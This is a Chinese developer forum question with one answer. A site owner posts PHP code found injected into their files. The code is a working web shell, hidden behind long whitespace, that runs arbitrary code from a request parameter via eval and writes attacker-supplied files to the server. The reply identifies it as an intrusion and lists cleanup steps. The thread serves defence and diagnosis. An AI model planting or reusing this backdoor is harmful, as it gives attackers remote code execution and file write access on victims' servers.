开发者社区> 问答> 正文

PHP文件莫名其妙的被加了代码,什么原因?

PHP文件莫名其妙的被加了代码,看不懂,求解释

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc";
if(isset($_REQUEST['cvbswp'])){ 
    $vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit();
} 
if(isset($_REQUEST['ztkb'])) {
    $lzoki = $_REQUEST['hyrvkum'];
    $xhwpemsz = $_REQUEST['ztkb'];
    $oarnubp = fopen($xhwpemsz, 'w');
    $npty = fwrite($oarnubp, $lzoki);
    fclose($oarnubp);
    echo $npty; exit();
} ?>

展开
收起
落地花开啦 2016-06-13 17:44:20 2183 0
1 条回答
写回答
取消 提交回答
  • 喜欢技术,喜欢努力的人

    你的网站应该被入侵了。
    eval 是用来动态执行一段代码,而这段代码是通过$_REQUEST传递过来,并且未做过滤。
    第二段是用来上传文件,讲攻击者自己的PHP文件上传至你的服务器。
    请检查一下服务器的用户,禁用未知的管理员帐号,并修改自己的用户名密码。
    PHP 配置文件中写的 MySQL 等帐号的密码请及时修改。
    对相关 PHP 文件进行检查,看是否还有其他入侵脚本。
    杀毒。

    2019-07-17 19:36:38
    赞同 展开评论 打赏
问答分类:
PHP
问答标签:
问答地址:
问答排行榜
最热
最新

相关电子书

更多
阿里云栖开发者沙龙PHP技术专场-直面PHP微服务架构挑战-高驰涛 立即下载
PHP安全开发:从白帽角度做安全 立即下载
PHP 2017.北京 全球开发者大会——高可用的PHP 立即下载